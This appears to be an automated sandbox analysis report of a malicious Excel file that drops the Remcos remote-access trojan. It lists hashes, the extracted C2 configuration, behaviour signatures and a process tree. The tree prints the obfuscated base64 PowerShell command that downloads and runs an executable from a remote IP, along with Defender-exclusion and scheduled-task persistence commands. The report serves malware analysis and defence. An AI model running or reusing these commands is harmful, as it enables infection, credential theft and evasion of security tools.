Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
25-09-2024 05:58
General
-
Target
TT4729920DBO.xls
-
Size
706KB
-
MD5
8e11d5aa70716def9a1a5b172fd97fd0
-
SHA1
1bde33d0c82ffb084be603c79ce8da90dbdc3f78
-
SHA256
4455c01cd33c703e07f94289d8d4be5286d1ae05b2a6ec3855e6e95ed5ad49f9
-
SHA512
7b1194cf3eb8cbacf4127db3b07f214c96898a73cc268e00fe977d2578466817e4706f90d56b69d4f7b30f76233d1170416422dc363fb27590c87526bf3375fa
-
SSDEEP
12288:q+UOAsHFnd7HeT/o8gg8Rsfe8XV+1eO41kGbbfVLqYQiylWxLOPw3Jd+o4:qepsAbg8Ray4nbbnkWEPAv
Malware Config
Extracted
remcos
RemoteHost
hiddenrmcnew.duckdns.org:7839
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PW8G0U
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
-
Executes dropped EXE 5 IoCs
-
Loads dropped DLL 5 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TT4729920DBO.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ur78hvq3.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7EE1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7EE0.tmp"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wUtVQHiucCbXP.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wUtVQHiucCbXP" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC5CF.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\ocfuax"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\zekebqrgu"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\jyqxbiczidkk"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
192B
MD53ab479afa32cbd29412cdcfd1a79eac2
SHA15bfbc4aaf4c7a5567a442f9dd582663c65e04ce8
SHA2560d5bd8ea03118f55e1eb44f258936343c9be6c818f8babc84ce667fbfa091939
SHA512caf2bd0a6d099cff766c8042c65cd857a82c3fdfbe0a72f20148698e8b522bcbf88e823bb6a4fa308c57f89f6238ae4d99ab1861901cf8139178492777b7fee0
-
Filesize
342B
MD5451696296b5172c95e7daa1e68cfffb4
SHA12ffe69ccb517cc5837545d02e4dbced8915e0f2d
SHA2563cf738c2d74f4e64bf18b50a6d445199ba968eaa891f98787ee5aadec0463196
SHA512d4a54f78ca9d3bd7fd0846889cd9377ef5dcc40d409ebd80d0828b17e792534d9d906b9cee059b77e73664a7b239abb8385dd05a5c3578c8d53b19a8278091cb
-
Filesize
8KB
MD5e3be68d74707e3b47def2fa536819351
SHA19ef8f2c4d2bab7ec2c5ee54b78e880403fa615ee
SHA256808a866838abedcc1b3cd42c5a6e7409dc6cc243568a0c3070ae74c2058c737c
SHA5125801e466c4076b04153007e785b35f515e27a2854ccfb1ff2d0cb48ff3b1be795859b642588fb150e074e802eff1a49dd825d37e5229f7e64b43911cb9b2da54
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5381e720d8cc49f0311c9304d475f4c1a
SHA18cc97deb72263c585c3a08221ccf08f9339d19ff
SHA2566d1ea0a2a2839fff4bf44d26d818f095a5604f6d5fd2e19d920a3fd0da505801
SHA51297d5f3916ec951a8d7bea41dee5268f57166ca99f9b71da51163ac6dd5a70b9a6aad94cb1c8e4593718ec1287e927c52904ae588df2f3ba3a92fe7e6327619c3
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
1KB
MD594da98be87282a45d796eaf7053af69a
SHA116684991276ec70bbefa1d7864f69428e4d28c60
SHA25657d0a2412975cdbf1d889535da13b15a01959051c3deb5daee27721228d15bc7
SHA512613a18e40f9927b6ee5db381c44c6b72ef59ce49c7acbfc3ad4f161a2beb86f864b43351469f02b780a587deb5f99ac1279580bff72d517a2ce97edc6cce9a4e
-
Filesize
3KB
MD579dcc26a1227a379980468ec4af11f5f
SHA1cb9c413cbb5e2328f1aa14a9f6193d3d99d68723
SHA2563981d95be61e393907d0e54dd43cc15d2a63406d4b4b7f3a8a038478a874041d
SHA512232d804f21b15c6b31efb1e5f4176c904bd4376140d65745ec47562ae531e95b322f1d4319c06f0cd854c33c2241820fc7921096bf8a3aa60237df297d43dc24
-
Filesize
7KB
MD5b729ce5e3d1acb74a874d4bc94807b28
SHA10eb284b8ffd704eb974d98baf69e2d80276fc089
SHA2567c97995742d41e5200e7dfb5adeece5a3f695315f59e864c71d8f8a0952c833b
SHA5127fa745b3593f7cf6e09833d2c8f32aecc3a981aed3c9659343d3b3a95a75fa091612262937964c4eada51e5e50c44945f633b7bbeca48839decf6e9aa361317f
-
Filesize
7KB
MD50b156edeed36fff0f14e48a74abdc17e
SHA1dd651f6b41b111115425cf7465c7eb0722301978
SHA256fef936c33dbefc58b5e98225530a757f45f7897ff0f9487fc3c8189c7ff25764
SHA5129abd2cff776da5c84f928fa893629e174ece180f6c6394fcd8bfd83713ad91c84e1183a71945188540de638aee73a7e33973471a088dcc671d07733895ddc1b5
-
Filesize
1.1MB
MD5311148c65ef0cadb803bccc2cf922fee
SHA1d70c32206a52470e3b622984e7fb6ab7668c5919
SHA256ff67f46cb0b8c93cc038c969376a92b04ab3809b0efd52f99bdfbbd9a991cc87
SHA5128a998d9e89a53b65ef1d5a996f5540d0c0ba7f964af274ef5991dac3c4fd6c3eb4b89f5bc54449b797ffede1f57bd8d4604f4df3cd46fadb6dc94391713208cc
-
Filesize
652B
MD56eedabdfc2df8fbf41c61872c60d90f0
SHA18755da89738e3eef9411e9302896d7910dc7c2e0
SHA256df7aa417da2b5d244684534360e53ffd20add598fcc8f1edeaf8db443a9929fd
SHA51286084c0c5f48e0cbb4fc2a363594eb0473565db8438d5e51152e065374cacb2b05143c30ef83cf008286b03c3bdc05d51c955511658e58faf3f27011df88c3ea
-
Filesize
473B
MD53bb844530f01f0263d147fc639cdaa17
SHA172a54c9e60fa65951724c7785e23472b5434bb6d
SHA256b7a4df6b846ba78b9234d149ebddc645595ea3ed7de89e667ac1d070d5c20231
SHA512b05fcd2cd4788d9887d93e4ba41f94c1620f74b30c550a08c09230525d82cc65aff6fdc6ff5887574f3b3fbe3e4ae06b188a7110f70c22d683d8cca22492084d
-
Filesize
309B
MD52c0debdabb2cd791745c562348ae8cb1
SHA19f3429da9ceff30b0f8ebc97a11396aaa82f8945
SHA256c497fd6295e7c49589de7f06e760747b1538a0d7525985b5a8b2b48e66116e4a
SHA512413607ac7d8866a6a21968831125dc4cefd9aaf6d817e1c9bf6fc9f9ff761075bedd798e0c82d2dc6e730e3fe6990600cc5c29ae4842f49b06162302f7c03b2a
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
4KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
480KB
-
Filesize
4KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
8KB
-
Filesize
768KB
-
Filesize
72KB
-
Filesize
1.1MB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
44KB